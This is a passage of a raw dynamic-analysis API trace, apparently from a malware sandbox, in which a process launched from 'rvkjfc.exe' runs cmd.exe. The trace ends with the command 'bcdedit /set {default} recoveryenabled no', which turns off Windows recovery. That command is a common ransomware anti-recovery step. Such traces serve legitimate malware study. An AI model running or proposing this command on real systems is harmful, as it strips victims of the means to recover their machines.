nBufferLength=0x104, lpBuffer=0x1af5d0, lpFilePart=0x1af5b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1af5b0*="Desktop") returned 0x25 [0043.869] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0043.869] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af2e0 | out: lpFindFileData=0x1af2e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x1eb790 [0043.869] FindClose (in: hFindFile=0x1eb790 | out: hFindFile=0x1eb790) returned 1 [0043.869] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1af2e0 | out: lpFindFileData=0x1af2e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x1eb790 [0043.870] FindClose (in: hFindFile=0x1eb790 | out: hFindFile=0x1eb790) returned 1 [0043.870] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0043.870] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1af2e0 | out: lpFindFileData=0x1af2e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x183bc620, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x183bc620, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x1eb790 [0043.870] FindClose (in: hFindFile=0x1eb790 | out: hFindFile=0x1eb790) returned 1 [0043.870] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0043.870] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0043.870] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0043.870] GetProcessHeap () returned 0x1d0000 [0043.870] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1eac80 | out: hHeap=0x1d0000) returned 1 [0043.870] GetEnvironmentStringsW () returned 0x1eb790* [0043.870] GetProcessHeap () returned 0x1d0000 [0043.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xae8) returned 0x1ec280 [0043.870] FreeEnvironmentStringsW (penv=0x1eb790) returned 1 [0043.870] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0043.870] GetProcessHeap () returned 0x1d0000 [0043.870] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1eb720 | out: hHeap=0x1d0000) returned 1 [0043.870] GetProcessHeap () returned 0x1d0000 [0043.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x4016) returned 0x1ecd70 [0043.871] GetProcessHeap () returned 0x1d0000 [0043.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x68) returned 0x1e95a0 [0043.871] GetProcessHeap () returned 0x1d0000 [0043.871] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1ecd70 | out: hHeap=0x1d0000) returned 1 [0043.871] GetConsoleOutputCP () returned 0x1b5 [0043.871] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d5bfe0 | out: lpCPInfo=0x49d5bfe0) returned 1 [0043.871] GetUserDefaultLCID () returned 0x409 [0043.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49d57b50, cchData=8 | out: lpLCData=":") returned 2 [0043.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af6e0, cchData=128 | out: lpLCData="0") returned 2 [0043.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af6e0, cchData=128 | out: lpLCData="0") returned 2 [0043.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af6e0, cchData=128 | out: lpLCData="1") returned 2 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49d6a740, cchData=8 | out: lpLCData="/") returned 2 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49d6a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49d6a460, cchData=32 | out: lpLCData="Tue") returned 4 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49d6a420, cchData=32 | out: lpLCData="Wed") returned 4 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49d6a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49d6a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49d6a360, cchData=32 | out: lpLCData="Sat") returned 4 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49d6a700, cchData=32 | out: lpLCData="Sun") returned 4 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49d57b40, cchData=8 | out: lpLCData=".") returned 2 [0043.872] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49d6a4e0, cchData=8 | out: lpLCData=",") returned 2 [0043.872] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0043.873] GetProcessHeap () returned 0x1d0000 [0043.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x0, Size=0x20c) returned 0x1e9680 [0043.873] GetConsoleTitleW (in: lpConsoleTitle=0x1e9680, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0043.873] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0043.873] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0043.873] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0043.873] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0043.873] GetProcessHeap () returned 0x1d0000 [0043.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x4012) returned 0x1ecd70 [0043.873] GetProcessHeap () returned 0x1d0000 [0043.873] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1ecd70 | out: hHeap=0x1d0000) returned 1 [0043.874] _wcsicmp (_String1="bcdedit", _String2=")") returned 57 [0043.874] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0043.874] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0043.874] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0043.874] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0043.874] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0043.874] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0043.874] GetProcessHeap () returned 0x1d0000 [0043.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb0) returned 0x1e98a0 [0043.874] GetProcessHeap () returned 0x1d0000 [0043.874] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x1e4600 [0043.875] GetProcessHeap () returned 0x1d0000 [0043.875] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x56) returned 0x1e9960 [0043.875] GetConsoleTitleW (in: lpConsoleTitle=0x1af5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0043.876] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0043.876] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0043.876] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0043.876] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0043.876] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0043.876] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0043.876] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0043.876] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0043.876] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0043.876] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0043.876] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0043.876] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0043.876] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0043.876] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0043.876] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0043.876] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0043.876] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0043.876] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0043.876] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0043.876] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0043.876] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0043.876] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0043.876] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0043.876] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0043.876] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0043.876] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0043.876] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0043.876] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0043.876] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0043.876] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0043.876] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0043.876] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0043.876] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0043.876] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0043.876] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0043.877] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0043.877] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0043.877] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0043.877] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0043.877] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0043.877] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0043.877] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0043.877] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0043.877] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0043.877] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0043.877] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0043.877] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0043.877] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0043.877] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0043.877] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0043.877] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0043.877] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0043.877] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0043.877] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0043.877] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0043.877] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0043.877] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0043.877] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0043.877] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0043.877] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0043.877] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0043.877] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0043.877] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0043.877] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0043.877] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0043.877] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0043.877] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0043.877] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0043.877] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0043.877] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0043.877] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0043.877] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0043.877] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0043.877] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0043.877] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0043.877] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0043.877] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0043.878] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0043.878] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0043.878] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0043.878] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0043.878] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0043.878] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0043.878] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0043.878] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0043.878] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0043.878] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0043.878] GetProcessHeap () returned 0x1d0000 [0043.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x218) returned 0x1e99c0 [0043.878] GetProcessHeap () returned 0x1d0000 [0043.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x66) returned 0x1e9be0 [0043.878] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0043.878] GetProcessHeap () returned 0x1d0000 [0043.878] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x420) returned 0x1d1320 [0043.878] SetErrorMode (uMode=0x0) returned 0x0 [0043.878] SetErrorMode (uMode=0x1) returned 0x0 [0043.879] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1d1330, lpFilePart=0x1aee80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1aee80*="Desktop") returned 0x25 [0043.879] SetErrorMode (uMode=0x0) returned 0x1 [0043.879] GetProcessHeap () returned 0x1d0000 [0043.879] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x0, Ptr=0x1d1320, Size=0x6c) returned 0x1d1320 [0043.879] GetProcessHeap () returned 0x1d0000 [0043.879] RtlSizeHeap (HeapHandle=0x1d0000, Flags=0x0, MemoryPointer=0x1d1320) returned 0x6c [0043.879] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0043.879] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.879] GetProcessHeap () returned 0x1d0000 [0043.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x128) returned 0x1e9c50 [0043.879] GetProcessHeap () returned 0x1d0000 [0043.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x240) returned 0x1e9d80 [0043.885] GetProcessHeap () returned 0x1d0000 [0043.885] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x0, Ptr=0x1e9d80, Size=0x12a) returned 0x1e9d80 [0043.885] GetProcessHeap () returned 0x1d0000 [0043.885] RtlSizeHeap (HeapHandle=0x1d0000, Flags=0x0, MemoryPointer=0x1e9d80) returned 0x12a [0043.885] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.885] GetProcessHeap () returned 0x1d0000 [0043.885] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xe8) returned 0x1e9ec0 [0043.885] GetProcessHeap () returned 0x1d0000 [0043.885] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x0, Ptr=0x1e9ec0, Size=0x7e) returned 0x1e9ec0 [0043.885] GetProcessHeap () returned 0x1d0000 [0043.885] RtlSizeHeap (HeapHandle=0x1d0000, Flags=0x0, MemoryPointer=0x1e9ec0) returned 0x7e [0043.886] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.886] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1aebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aebf0) returned 0xffffffffffffffff [0043.886] GetLastError () returned 0x2 [0043.886] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x1aebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aebf0) returned 0xffffffffffffffff [0043.886] GetLastError () returned 0x2 [0043.886] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.886] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x1aebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aebf0) returned 0x1e9f50 [0043.886] GetProcessHeap () returned 0x1d0000 [0043.886] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x0, Size=0x28) returned 0x1e4630 [0043.886] FindClose (in: hFindFile=0x1e9f50 | out: hFindFile=0x1e9f50) returned 1 [0043.886] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x1aebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aebf0) returned 0xffffffffffffffff [0043.886] GetLastError () returned 0x2 [0043.886] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aebf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aebf0) returned 0x1e9f50 [0043.886] GetProcessHeap () returned 0x1d0000 [0043.887] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x0, Ptr=0x1e4630, Size=0x8) returned 0x1e9fb0 [0043.887] FindClose (in: hFindFile=0x1e9f50 | out: hFindFile=0x1e9f50) returned 1 [0043.887] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0043.887] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0043.887] GetConsoleTitleW (in: lpConsoleTitle=0x1af140, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rvkjfc.exe") returned 0x30 [0043.887] InitializeProcThreadAttributeList (in: lpAttributeList=0x1aeef8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1aeeb8 | out: lpAttributeList=0x1aeef8, lpSize=0x1aeeb8) returned 1 [0043.887] UpdateProcThreadAttribute (in: lpAttributeList=0x1aeef8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1aeea8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1aeef8, lpPreviousValue=0x0) returned 1 [0043.887] GetStartupInfoW (in: lpStartupInfo=0x1af010 | out: lpStartupInfo=0x1af010*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0043.887] GetProcessHeap () returned 0x1d0000 [0043.887] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x1e4630 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0043.887] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0043.888] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0043.888] GetProcessHeap () returned 0x1d0000 [0043.888] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1e4630 | out: hHeap=0x1d0000) returned 1 [0043.888] GetProcessHeap () returned 0x1d0000 [0043.888] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x12) returned 0x1e8370 [0043.888] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0043.889] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} recoveryenabled no", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1aef30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} recoveryenabled no", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1aeee0 | out: lpCommandLine="bcdedit /set {default} recoveryenabled no", lpProcessInformation=0x1aeee0*(hProcess=0x54, hThread=0x50, dwProcessId=0x730, dwThreadId=0x78c)) returned 1 [0044.132] CloseHandle (hObject=0x50) returned 1 [0044.132] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0044.132] GetProcessHeap () returned 0x1d0000 [0044.132] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1ec280 | out: hHeap=0x1d0000) returned 1 [0044.132] GetEnvironmentStringsW () returned 0x1eac80* [0044.133] GetProcessHeap () returned 0x1d0000 [0044.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xae8) returned 0x1eb770 [0044.133] FreeEnvironmentStringsW (penv=0x1eac80) returned 1 [0044.133] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0044.690] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1aee28 | out: lpExitCode=0x1aee28*=0x0) returned 1 [0044.690] CloseHandle (hObject=0x54) returned 1 [0044.690] _vsnwprintf (in: _Buffer=0x1af098, _BufferCount=0x13, _Format="%08X", _ArgList=0x1aee38 | out: _Buffer="00000000") returned 8 [0044.690] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0044.690] GetProcessHeap () returned 0x1d0000 [0044.690] HeapFree (in: hHeap=0x1d0000, dwFlags=0x0, lpMem=0x1eb770 | out: hHeap=0x1d0000) returned 1 [0044.690] GetEnvironmentStringsW () returned 0x1eac80* 